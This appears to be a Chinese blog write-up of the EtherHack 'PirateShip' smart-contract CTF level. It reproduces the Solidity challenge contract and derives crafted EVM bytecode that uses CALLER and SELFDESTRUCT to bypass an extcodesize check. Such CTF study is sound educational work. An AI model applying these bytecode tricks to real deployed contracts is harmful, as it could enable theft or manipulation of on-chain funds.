class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.4.19;</span><br><span class="line"></span><br><span class="line">contract PirateShip &#123;</span><br><span class="line">    address public anchor &#x3D; 0x0;</span><br><span class="line">    bool public blackJackIsHauled &#x3D; false;</span><br><span class="line"></span><br><span class="line">    function sailAway() public &#123;</span><br><span class="line">        require(anchor !&#x3D; 0x0);</span><br><span class="line"></span><br><span class="line">        address a &#x3D; anchor;</span><br><span class="line">        uint size &#x3D; 0;</span><br><span class="line">        assembly &#123;</span><br><span class="line">            size :&#x3D; extcodesize(a)</span><br><span class="line">        &#125;</span><br><span class="line">        if(size &gt; 0) &#123;</span><br><span class="line">            revert(); &#x2F;&#x2F; it is too early to sail away</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        blackJackIsHauled &#x3D; true; &#x2F;&#x2F; Yo Ho Ho!</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function pullAnchor() public &#123;</span><br><span class="line">        require(anchor !&#x3D; 0x0);</span><br><span class="line">        require(anchor.call()); &#x2F;&#x2F; raise the anchor if the ship is ready to sail away</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function dropAnchor(uint blockNumber) public returns(address addr) &#123;</span><br><span class="line">        &#x2F;&#x2F; the ship will be able to sail away in 100k blocks time</span><br><span class="line">        require(blockNumber &gt; block.number + 100000);</span><br><span class="line"></span><br><span class="line">        &#x2F;&#x2F; if(block.number &lt; blockNumber) &#123; throw; &#125;</span><br><span class="line">        &#x2F;&#x2F; suicide(msg.sender);</span><br><span class="line"></span><br><span class="line">        uint[8] memory a;</span><br><span class="line">        a[0] &#x3D; 0x6300;      &#x2F;&#x2F; PUSH4 0x00...</span><br><span class="line">        a[1] &#x3D; blockNumber; &#x2F;&#x2F; ...block number (3 bytes)</span><br><span class="line">        a[2] &#x3D; 0x43;        &#x2F;&#x2F; NUMBER</span><br><span class="line">        a[3] &#x3D; 0x10;        &#x2F;&#x2F; LT</span><br><span class="line">        a[4] &#x3D; 0x58;        &#x2F;&#x2F; PC</span><br><span class="line">        a[5] &#x3D; 0x57;        &#x2F;&#x2F; JUMPI</span><br><span class="line">        a[6] &#x3D; 0x33;        &#x2F;&#x2F; CALLER</span><br><span class="line">        a[7] &#x3D; 0xff;        &#x2F;&#x2F; SELFDESTRUCT</span><br><span class="line"></span><br><span class="line">        uint code &#x3D; assemble(a);</span><br><span class="line"></span><br><span class="line">        &#x2F;&#x2F; init code to deploy contract: stores it in memory and returns appropriate offsets</span><br><span class="line">        uint[8] memory b;</span><br><span class="line">        b[0] &#x3D; 0;             &#x2F;&#x2F; allign</span><br><span class="line">        b[1] &#x3D; 0x6a;          &#x2F;&#x2F; PUSH11</span><br><span class="line">        b[2] &#x3D; code;          &#x2F;&#x2F; contract</span><br><span class="line">        b[3] &#x3D; 0x6000;        &#x2F;&#x2F; PUSH1 0</span><br><span class="line">        b[4] &#x3D; 0x52;          &#x2F;&#x2F; MSTORE</span><br><span class="line">        b[5] &#x3D; 0x600b;        &#x2F;&#x2F; PUSH1 11 ;; length</span><br><span class="line">        b[6] &#x3D; 0x6015;        &#x2F;&#x2F; PUSH1 21 ;; offset</span><br><span class="line">        b[7] &#x3D; 0xf3;          &#x2F;&#x2F; RETURN</span><br><span class="line"></span><br><span class="line">        uint initcode &#x3D; assemble(b);</span><br><span class="line">        uint sz &#x3D; getSize(initcode);</span><br><span class="line">        uint offset &#x3D; 32 - sz;</span><br><span class="line"></span><br><span class="line">        assembly &#123;</span><br><span class="line">            let solidity_free_mem_ptr :&#x3D; mload(0x40)</span><br><span class="line">            mstore(solidity_free_mem_ptr, initcode)</span><br><span class="line">            addr :&#x3D; create(0, add(solidity_free_mem_ptr, offset), sz)</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        require(addr !&#x3D; 0x0);</span><br><span class="line">        anchor &#x3D; addr;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    &#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F; HELPERS &#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;&#x2F;</span><br><span class="line"></span><br><span class="line">    function assemble(uint[8] chunks) internal pure returns(uint code) &#123;</span><br><span class="line">        for(uint i&#x3D;chunks.length; i&gt;0; i--) &#123;</span><br><span class="line">            code ^&#x3D; chunks[i-1] &lt;&lt; 8 * getSize(code);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function getSize(uint256 chunk) internal pure returns(uint) &#123;</span><br><span class="line">        bytes memory b &#x3D; new bytes(32);</span><br><span class="line">        assembly &#123; mstore(add(b, 32), chunk) &#125;</span><br><span class="line">        for(uint32 i &#x3D; 0; i&lt; b.length; i++) &#123;</span><br><span class="line">            if(b[i] !&#x3D; 0) &#123;</span><br><span class="line">                return 32 - i;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        return 0;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>要求我们 blackJackIsHauled = true 这就要求在</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">assembly</span> &#123; <span class="attribute">size </span>:= <span class="built_in">extcodesize</span>(a)  &#125;</span><br></pre></td></tr></table></figure>
<p>时，返回结果不为零，此时的a对应的就是anchor地址，而anchor地址由dropAnchor函数负责修改</p>
<p>此时会使用字节码部署一个合约，<code>0x6300____4310585733ff600052600b6015f3</code></p>
<p>其中<em>__</em>处的字节码是我们可以控制的，注意到其中有一个指令是0xff，也就是SELFDESTRUCT，会执行自毁操作，我们验证一下会不会导致size为零</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">contract Contract &#123;</span><br><span class="line">    function main() &#123;</span><br><span class="line"></span><br><span class="line">        selfdestruct(address(0x0));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">contract ttt&#123;</span><br><span class="line">    bool public blackJackIsHauled &#x3D; false;</span><br><span class="line">    function sailAway(address anchor) public &#123;</span><br><span class="line">        require(anchor !&#x3D; 0x0);</span><br><span class="line"></span><br><span class="line">        address a &#x3D; anchor;</span><br><span class="line">        uint size &#x3D; 0;</span><br><span class="line">        assembly &#123;</span><br><span class="line">            size :&#x3D; extcodesize(a)</span><br><span class="line">        &#125;</span><br><span class="line">        if(size &gt; 0) &#123;</span><br><span class="line">            revert(); &#x2F;&#x2F; it is too early to sail away</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        blackJackIsHauled &#x3D; true; &#x2F;&#x2F; Yo Ho Ho!</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/2022/03/10/35/image-20210926180727962.png" alt="image-20210926180727962"></p>
<p>那也就是说我们要执行ff，也就是说我们需要在栈顶存入一个地址，由EVM opcode可以知道以下指令满足</p>
<p><code>30</code>    <code>31</code> <code>33</code>  <code>41</code></p>
<p>同时实验各自与ff组合，比如33ff，反编译出来</p>
<p><img src="/2022/03/10/35/image-20220310223837749.png" alt="image-20220310223837749"></p>
<p>而63指令是PUSH4   也就是说我们需要填充三个字节的指令，而后接上33ff，总字节码就是</p>
<p>0x630000000033ff4310585733ff600052600b6015f3</p>
<p><img src="/2022/03/10/35/image-20220310224057554.png" alt="image-20220310224057554"></p>
<p>实现自毁，同时前面有一个限制 require(blockNumber &gt; block.number + 100000);所以我们不能填充00，随便选一个其他的都可以。</p>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>Zpano
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://zpano.cn/2022/03/10/35/" title="Etherhack wp">https://zpano.cn/2022/03/10/35/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/%E5%8C%BA%E5%9D%97%E9%93%BE%E5%AE%89%E5%85%A8/" rel="tag"># 区块链安全</a>
              <a href="/tags/%E6%99%BA%E8%83%BD%E5%90%88%E7%BA%A6%E5%AE%89%E5%85%A8/" rel="tag"># 智能合约安全</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/03/10/34/" rel="prev" title="Capture the Ether wp">
                  <i class="fa fa-chevron-left"></i> Capture the Ether wp
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/03/11/36/" rel="next" title="Codegate CTF 2022 Ankiwoom Invest">
                  Codegate CTF 2022 Ankiwoom Invest <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






      

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

    </div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
      

      

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Zpano</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">202k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">3:04</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  




  <script src="/js/local-search.js"></script>















  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>








  

  
      <script>
  if (typeof MathJax === 'undefined') {
    window.MathJax = {
      tex: {
        inlineMath: {'[+]': [['$', '$']]},
        tags: 'ams'
      },
      options: {
        renderActions: {
          findScript: [10, doc => {
            document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
              const display = !!node.type.match(/; *mode=display/);
              const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
              const text = document.createTextNode('');
              node.parentNode.replaceChild(text, node);
              math.start = {node: text, delim: '', n: 0};
              math.end = {node: text, delim: '', n: 0};
              doc.math.push(math);
            });
          }, '', false],
          insertedScript: [200, () => {
            document.querySelectorAll('mjx-container').forEach(node => {
              const target = node.parentNode;
              if (target.nodeName.toLowerCase() === 'li') {
                target.parentNode.classList.add('has-jax');
              }
            });
          }, '', false]
        }
      }
    };
    const script = document.createElement('script');
    script.src = '//cdn.jsdelivr.net/npm/mathjax@3.1.2/es5/tex-mml-chtml.js';
    script.defer = true;
    document.head.appendChild(script);
  } else {
    MathJax.startup.document.state(0);
    MathJax.typesetClear();
    MathJax.texReset();
    MathJax.typeset();
  }
</script>

    

  

</body>
</html>
